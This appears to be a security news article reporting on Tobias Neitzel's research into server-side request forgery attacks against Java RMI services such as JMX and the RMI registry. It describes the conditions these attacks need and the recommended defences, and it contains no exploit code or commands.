Trust boundaries breached by security shortcomings
Java RMI services can be attacked through server-side request forgery (SSRF) attacks, according to a detailed analysis of the problem by security researcher Tobias Neitzel.
Java RMI is an object-oriented Remote Procedure Call (RPC) mechanism available in most Java installations. Software developers can use the technology to make functions available over a network.
For communication, Java RMI relies on serialized Java objects – a mechanism that attackers are often able to target, despite the fact that the technology has gone through a process of hardening and tempering over recent years, Neitzel discovered.
In a detailed technical blog post, the researcher explains how default RMI components can be attacked to variable outcomes. Potential outcomes can result in remote code execution, Neitzel told The Daily Swig.
SSRF attacks in general allow an attacker to trick a server-side application to make HTTP requests to a domain selected by an attacker, a behaviour that open the door to all manner of malfeasance.
“As with all SSRF techniques, the major problem is that attackers may be able to attack RMI services that are supposed to only be accessed from trusted networks,” Neitzel explained.
“Securing RMI properly is not that intuitive and there is a lot of hidden attack surface. Instead of configuring it properly, administrators often take the easy route and only allow access from trusted networks or clients.”
Neitzel’s research demonstrated that an external attacker “may be able to exploit insecure configured internal services by utilizing an SSRF vulnerability in an external service”, among other techniques.
The most commonly used RMI service is JMX. Neitzel showed it was possible to compromise a backend JMX service via SSRF, but only providing the system returns responses from the backend service and accept arbitrary bytes within them.
Similarly, SSRF-based attacks on default RMI components, such as the RMI registry, are also possible, though only where the system allows arbitrary bytes to be sent to the backend service.
“Java RMI is a binary protocol and requires all sorts of different data types during communication,” Neitzel said.
Susceptibility to SSRF attacks is symptomatic of wider insecurities that are all-too commonplace.
“Services may expose dangerous methods, do not implement deserialization filters, or are outdated and contain known vulnerabilities (e.g remote class loading),” Neitzel told The Daily Swig.
The German researcher’s blog post goes on to list security best practices and counter-measures for RMI services against potential attack.
These include enabling TLS protected communication for all RMI endpoints, using deserialization filters, and adding stronger authentication controls.